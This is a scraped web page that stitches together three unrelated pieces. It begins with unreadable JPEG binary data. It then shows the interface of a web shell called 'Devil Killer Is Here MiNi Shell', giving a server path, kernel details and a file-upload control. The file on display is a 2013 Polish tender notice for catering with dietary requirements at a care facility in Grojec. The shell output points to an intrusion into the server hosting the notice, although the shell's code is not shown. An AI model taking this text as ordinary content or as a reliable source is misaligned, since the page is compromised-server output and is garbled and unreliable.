JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130305/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130305/88072-N-2013.html

<p class="kh_header"><b>Grojec: świadczenie usług cateringowych żywienia z uwzględnieniem zaleceń dietetycznych dla pacjentów PZOL w Grojcu</b><br>
<b>Numer ogłoszenia: 88072 - 2013; data zamieszczenia: 05.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Zakłady Opiekuńczo-Lecznicze w Grojcu , Aleja Ogrodowa 1, 32-615 Grojec, woj. małopolskie, tel. 33 8428136, faks 33 8428903.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pzol.cba.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> świadczenie usług cateringowych żywienia z uwzględnieniem zaleceń dietetycznych dla pacjentów PZOL w Grojcu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług całodziennego żywienia dla pacjentów PZOL w Grojcu ul.Al.Ogrodowa 1 w systemie cateringowym  z uwzględnieniem zaleceń dietetycznych w zakresie przygotowywania i dostarczania do siedziby Zamawiającego oraz odbioru odpadów pokonsumcyjnych.

Średnia szacunkowa ilość osobodni w ciągu 18 m-cy wynosi 63020.
Zakład posiada dwa oddziały: psychiatryczny i ogólny z podziałem na:
Oddział Psychiatryczny - II
Oddział Ogólny              - I, III 
Średnia miesięczna ilość osobodni żywienia wynosi 3501 uwzględniając dodatki w diecie cukrzycowej
/osobodzień-stawka dzienna żywienia rozumiana jako 3 posiłki dziennie we wszystkich dietach lub 5 posiłków w diecie cukrzycowej, wysokokalorycznej, wysokobiałkowej/

Posiłki dla pacjentów winny być dostarczane codziennie  o  ściśle ustalonych godzinach
- śniadanie - godzina 7.00
- obiad       -  godzina 11.00
- kolacja    -  godzina 16.00
Za każde opóźnienie w dostarczeniu posiłków Wykonawca zapłaci kary umowne zawarte w umowie.
  
Przygotowanie posiłków odbywać się będzie z uwzględnieniem diet stosowanych w tutejszym Zakładzie oraz zgodnie z zaleceniem lekarza. Żywienie pacjentów w PZOL w Grojcu opiera się na niżej wymienionych dietach :
1.Dieta Podstawowa
- podstawowa mielona 
- podstawowa redukcyjna 
- podstawowa redukcyjna mielona 
- podstawowa redukcyjna 
- podstawowa redukcyjna mielona 
- podstawowa wysokokaloryczna - 5 posiłków
- podstawowa wysokokaloryczna mielona - 5 posiłków
- podstawowa z ograniczeniem soli
- podstawowa z ograniczeniem fosforu
- podstawowa z ograniczeniem potasu

2.Dieta Wątrobowa
- wątrobowa mielona
- wątrobowa bez mleka i produktów mlecznych
- wątrobowa bez mleka i produktów mlecznych mielona
- wątrobowa redukcyjna

3.Dieta żołądkowa
- żołądkowa mielona
4.Dieta Łatwostrawna
- łatwostrawna mielona

5.Dieta Cukrzycowa - 5 posiłków
- cukrzycowa mielona - 5 posiłków
- cukrzycowa bez mleka, jarzyny, owoce gotowane- 5 posiłków

6.Dieta Wysokobiałkowa zawierająca 100-120g białka- 5 posiłków

7.Dieta Niskobiałkowa zawierająca do 40 g białka

8.Dieta Kleikowa

9.Diety indywidualne na zlecenie lekarza

10.Dieta niskotłuszczowa

11.Dieta z ograniczeniem produktów zawierających cholestorol

Diety mogą ulec zmianie w zależności od stanu zdrowia pacjentów.  

Zamawiający zastrzega sobie prawo niezrealizowania całości zamówienia, jeżeli jego indywidualne potrzeby będą mniejsze od przewidywanych.       

Wykonawca będzie przygotowywać posiłki w oparciu o system HACCP zgodnie z ustawą z 25.08.2006  o bezpieczeństwie żywności i żywienia / Dz.U z 2010r Nr 136 poz.914 z późniejszymi zmianami/

Wykonawca będzie zobowiązany do sporządzenia dziennych jadłospisów w formie tzw.dekadówki /10-dniowy jadłospis/dla wszystkich diet obowiązujących u Zamawiającego, z podaniem gramatury potraw. Jadłospis winien być przedstawiony do akceptacji osobie wyznaczonej przez Zamawiającego z 7-dniowym wyprzedzeniem. Zamawiający ma 2 dni na akceptację i wniesienie uwag do jadłospisu. Jeżeli jadłospis nie zostanie zaakceptowany przez  Zamawiającego, Wykonawca w terminie 2-dniowym ma obowiązek dostarczyć nowy jadłospis do akceptacji.  
Jadłospis dekadowy/po akceptacji/ dostarczony będzie w 5 - kopiach.

Wykonawca zobowiązany jest do codziennego dostarczania w formie pisemnej 
dziennego jadłospisu z wyszczególnieniem diet oraz nanoszeniem aktualnych poprawek

Wykonawca będzie przygotowywać posiłki tradycyjne w okresie świąt Bożego Narodzenia, Wielkanocy oraz na okazyjne uroczystości.

Zamawianie ilości oraz rodzajów diet posiłków będzie się odbywało przez pracownika  tutejszego Zakładu z wyprzedzeniem 1 -dniowym do godziny 13:00 
z możliwością korekty zamówienia w dniu dostawy: do godziny 6:10 korekta śniadania, do godziny 10:00 korekta obiadu, do godziny 15:00 korekta kolacji.

Zamawiający wymaga, aby dodatki do śniadania, obiadu, kolacji takie jak wędlina, sery, dodatki jarzynowe i owoce, ryby, mięso itp. były porcjowane, pozostałe jak zupy, napoje, jajecznica, galaretka drobiowa, ziemniaki, posiłki mączne itp. w odpowiednich zbiorczych pojemnikach z podziałem na poszczególne oddziały i opisem ilości porcji i rodzajem diety.
 
Dostarczanie posiłków winno odbywać się w odpowiednio przeznaczonych do tego celu pojemnikach termoizolacyjnych z atestem, wykonanych z tworzywa zabezpieczającego posiłki przed wylaniem i schłodzeniem:
-termosy jednoskładnikowe przeznaczone do transportu gorących posiłków /zupa, napoje/,
-termosy wieloskładnikowe wypełnione pojemnikami, które występują w różnej konfiguracji, zapewnią dostarczanie na oddziały /Psychiatryczny -II, Ogólny I,III/ poszczególnych zamówionych posiłków-diet. Każdy pojemnik powinien być opisany / ilość porcji i rodzaj diety/.
Należy zapewnić wymagany standard Sanitarno-Epidemiologiczny.

Właścicielem niezbędnej ilości termosów jest Wykonawca.
Dbanie o czystość termosów/mycie po każdym dostarczonym posiłku i dezynfekcja/ należy do Wykonawcy. 

Posiłki muszą się charakteryzować wysoką jakością, posiadać właściwe walory smakowe i estetyczne oraz właściwą temperaturę nie niższą niż:
zupa - temperatura  75°C
II danie- temperatura 63° C
gorące napoje - temperatura  80° C
dania zimne / sery, wędliny, sałatki itp./ - 4°C 

Wykonawca zobowiązuje się do odbioru odpadów pokonsumcyjnych. Odbiór następuje po każdym posiłku. Mycie i dezynfekcja pojemników należy do Wykonawcy. Koszt transportu odpadów pokonsumpcyjnych ponosi Wykonawca. Pojemniki na odpady powinny być zamykane. Pojemniki na odpady dostarcza Wykonawca. odpowiada  on również za ich stan sanitarny.

Wykonawca zobowiązany jest do pobierania i przechowywania oznakowanych próbek pokarmowych stosownie do Rozporządzenia Ministra Zdrowia z dnia 17 kwietnia 2007r w sprawie pobierania i przechowywania próbek żywności przez zakłady żywienia zbiorowego typu zamkniętego /Dz.U. Nr 80 poz. 545 /

Zamawiający wyklucza użycia do przygotowania posiłków gotowych potraw  /półproduktów, mrożonych pierogów, klusek, pulpetów/.Wyklucza się możliwość przygotowania potraw z proszku i mrożonych produktów.

Jadłospis winien uwzględnić:
-zupę mleczną 
-mieszane pieczywo krojone
-bułki
-różnorodne wędliny /z podaniem w jadłospisie rodzaju wędliny/ 
-do śniadań ,obiadów i kolacji dodatek sezonowych warzyw i owoców
-pasty jako dodatek do śniadania, kolacji / z podaniem składników i gramatury poszczególnych składników/
-sery twarogowe topione, żółte
-parówki
-dżem, miód, krem czekoladowy / 1 x w dekadzie tylko jeden z tych wymienionych produktów/ 
-jajka, jajecznica
-galaretka drobiowa
-sałatki jarzynowe
-różnorodne potrawy mięsne/ z podaniem w jadłospisie z jakiego mięsa jest przyrządzona potrawa/ - z wykluczeniem fasolki po bretońsku, makaronu, ryżu z sosem mięsnym-preferowane mięso w całości postaci sztuki mięsa ,fileta, udka, roladki, pieczeni, kotleta - co najmniej 5 x w dekadzie.
-zróżnicowane potrawy mączne/ kluski naleśniki, makarony, pierogi -własny wyrób/
-bigos nie częściej niż 2X w miesiącu
-placki ziemniaczane /nie z proszku ,mrożonek/ przynajmniej raz w miesiącu
-pierogi /różny rodzaj/  2 razy w dekadzie / własny wyrób z wykluczeniem mrożonych/
-naleśniki  1 raz w dekadzie  
-potrawy z ryb/ z wykluczeniem paluszków rybnych /zalecane 1 raz w dekadzie/
do drugiego dania obiadowego
-kasza, ryż, makaron nie częściej niż 2 razy w miesiącu 
-zróżnicowane napoje na bazie mleka

Dodatki do posiłków powinny być porcjowane.
Przynajmniej raz w miesiącu ciasto własnego wypieku

WYMAGANA MINIMALNA GRAMATURA PRODUKTÓW I POTRAW GOTOWANYCH
(NA TALERZU) Na 1 posiłek

L.P.	RODZAJ PRODUKTU/ POTRAWY	GRAMATURA

	
	Śniadanie	kolacja
1	Pieczywo mieszany	100g	50g
2	Bułka kajzerka 1 szt. a 50g lub wek	50g	-
3	Cukier do kawy zbożowej/herbaty	20 g	20g
4	Kawa zbożowa z mlekiem/kakao	250 ml	250 ml
5	Herbata	250 ml	250
6	Zupa mleczna	250 ml	
7	Masło 82% tłuszczu	20g	20g
8	Wędlina krojona	50g
9	Kiełbasa, parówka na gorąco	lOOg
10	Pasty do pieczywa	80g
11	Twarożek	80g
12	Jajecznica	100g
13	Ser żółty krojony	50g
14	Ser topiony	50g
15	Dżem	50g
16	Miód	40g
17	Krem czekoladowy	40g
18	Wędlina podrobowa	50g
19	Jajko	1 szt.
20	Galaretka drobiowa	100g
21	Sałatka jarzynowa	150g
22	Dodatki w postaci jarzyn	100g
23	Sałata zielona	20 g
24	Pomidor	1 szt.
II.        Posiłek obiadowy
1	Zupa	450 ml
2	Ziemniaki	250g
3	Kluski śląskie, kopytka	200g
4	Makaron do zup	50g
5	Sosy	80g
6	Dodatki warzywne do II dania np.    surówki,    marchewka    z groszkiem,   buraczki,   kapusta biała        duszona,        jarzyny gotowane	15Og
7	Sałata zielona,mizeria            ze śmietaną/sosem vinegrette	150-mizeia
 50- sałata zielona
+ dodatki
8	Udko z kurczaka	1 szt.
9	Potrawka z kurczaka	180g, mięso -lOOg, 80g sos
10	Filet z kurczaka	80g
11	Zrazy zawijane	80g
12	Sztuka mięsa	80g
13	Kotlet mielony	lOOg
14	Pieczeń wieprzowa + sos	80g +80g
15	Kotlet schabowy	80g
17	Gulasz wieprzowy, wołowy	180g: mięso lOOg, sos-80g

18	Bitki 	80g, sos - 80g
19	Klopsiki, pulpet	80g
20	Ryba w jarzynach	80g ryba, jarzyny - 50g
21	Filet z ryby smażony	100g
22	Risotto z mięsem drobiowym i jarzynami	200g
23	Bigos	400g
24	Łazanki z kapustą i mięsem	300g
25	Pyzy z mięsem	200g
26	Kotlet z jaj	80g
27	Gołąbki z mięsem i ryżem / sos	250g/ lOOg
28	Naleśniki z serem	250g
29	Naleśniki z dżemem	150g
30	Placki ziemniaczane	300g
31	Makaron z serem białym	200g
32	Makaron do II dania	200g
33	Makaron z serem	300g
34	Ryż z jabłkami	300g
35	Ryż na sypko	150g
36	Pierogi z mięsem, owocami, ruskie  z serem i inne	300g
37	Kasza na sypko	200g
38	Kompot lub sok	250 ml


Do przygotowywania potraw należy używać produktów wysokiej jakości i zawsze świeżych.

Wykonawca dostarcza na oddziały w razie zgłoszenia dodatki: cukier, herbata, suchary.

Wykonawca będzie zobowiązany do umożliwienia Zamawiającemu przeprowadzenia kontroli poprawności realizacji postanowień umowy, udostępnić Zamawiającemu niezbędne dokumenty
/ wartości odżywcze potraw, ilość i rodzaj produktów zużytych do ich przygotowania, dokumenty z kontroli sanepidu i innych oceny stanu sanitarnego kuchni i pomieszczeń sanitarnych, jadłospisów dokonanej przez Sanepid/.

W przypadku zakwestionowania wymagań dotyczących realizacji umowy, w tym przygotowywanych posiłków Wykonawca jest zobowiązany do ich wymiany w ciągu 40 minut od chwili zgłoszenia.

W przypadku nie uznania zgłoszonej  reklamacji Zamawiający zastrzega sobie prawo wezwania Wykonawcy w celu dokonania wspólnej oceny zasadności reklamacji.
Osobami upoważnionymi ze strony Zamawiającego są:
Dietetyk Przełożona Pielęgniarek lub upoważnione pielęgniarki

Wymienieni wyżej pracownicy uprawnieni są zarówno do wstępnej kontroli organoleptycznej jak i do degustacji posiłków przed ich wydaniem. Odpowiednia adnotacja poczyniona zostanie w jadłospisie z zaznaczeniem dnia i godziny oceny.

Za uchybienia ujawnione w trakcie kontroli np. Sanepidu wynikające ze świadczonej przez Wykonawcę usługi, której następstwem będą m.in. mandaty, Wykonawca zapewnia na własny koszt i we własnym zakresie ciągłość żywienia w przypadku awarii urządzeń bądź wystąpienia innych okoliczności uniemożliwiających przygotowanie posiłków. Wykonawca w tej sytuacji zobowiązany jest do natychmiastowego powiadomienia o tym Zamawiającego.
Wykonawca jest zobowiązany do bieżącego informowania  Zamawiającego o poczynionych działaniach w ramach zapewnienia ciągłości żywienia. Jednocześnie w wypadku o którym mowa jak wyżej w mocy pozostają wszelkie postanowienia umowy, zwłaszcza w zakresie reżimu sanitarnego.

Upoważniony pracownik Zamawiającego ma prawo do przeprowadzenia dochodzenia epidemiologicznego obejmującego proces produkcji i transport posiłków w przypadku podejrzenia zatrucia pokarmowego.  

Faktura będzie wystawiona na podstawie rejestru osobodni żywienia prowadzonych i dostarczonych do 2 -go dnia po zakończeniu miesiąca przez Zamawiającego, za faktyczną ilość otrzymanych i wydanych śniadań, obiadów i kolacji..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>zamawiający dopuszcza udzielenie zamówień uzupełniających stanowiących nie więcej niż 50% wartości zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6, 55.32.20.00-3, 55.52.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 18.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda od wykonawców wniesienia wadium w wysokości: 6000 złotych
Wadium wnosi się przed upływem terminu składania ofert.
Wadium może być wniesione w jednej lub kilku następujących formach:
-pieniądzu,
-poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
-gwarancjach bankowych;
-gwarancjach ubezpieczeniowych;
-poręczeniach udzielanych przez podmioty, o których mowa w art.6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2007r Nr 42, poz.275).
Wadium wnoszone w pieniądzu wpłacić należy przelewem na rachunek bankowy: 
Bank Spółdzielczy w Andrychowie o/Oświęcim nr 87 8110 1023 2003 0300 8852 0001 
W przypadku wniesienia wadium w innej formie niż pieniądz oryginał należy złożyć w Sekretariacie w siedzibie Zamawiającego.
Potwierdzenie wpłacenia lub wadium w innej formie niż pieniądz należy złożyć w formie uwierzytelnionej kserokopii w osobnej kopercie z napisem (Potwierdzenie wpłaty wadium)
wraz z ofertą w Sekretariacie Zamawiającego w Grojcu, Al.Ogrodowa 1.
Wadium zostanie zwrócone zgodnie art.46 ustawy PZP.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zezwolenie/decyzję/opinię właściwego organu inspekcji sanitarnej uprawniającą Wykonawcę do prowadzenia działalności cateringowej;
Zezwolenie/decyzję/opinię właściwego organu inspekcji sanitarnej stwierdzające dopuszczenie środków transportu w zakresie przewozu żywności. Warunek ten będzie oceniony wg formuły spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonawca spełni ten warunek jeżeli wykaże, iż w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy-w tym okresie, świadczył lub świadczy co najmniej trzy usługi cateringowe żywienia wraz z podaniem ich wartości,  dat wykonania i podmiotów, na rzecz których  usługi zostały wykonane, oraz załączy dowody, że usługi zostały wykonane lub są wykonywane należycie. Warunek ten będzie oceniony wg formuły spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonawca spełni ten warunek jeżeli wykaże, że dysponuje:
    a) przynajmniej jedną kuchnią posiadającą decyzję Państwowej Inspekcji Sanitarnej zatwierdzającą zakład do produkcji posiłków i ich wywozu do odbiorców zewnętrznych. Kuchnia musi być w dyspozycji wykonawcy na okres nie krótszy niż planowany termin wykonywania niniejszego zamówienia, tj.18 miesięcy od dnia podpisania umowy,
     b)co najmniej jednym samochodem posiadającym decyzję/opinię Państwowego Inspektora sanitarnego, potwierdzającą dopuszczenie go do przewozu posiłków.   
Warunek ten będzie oceniony wg formuły spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonawca wykaże, że spełni ten warunek jeśli wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.Warunek ten będzie oceniony wg formuły spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
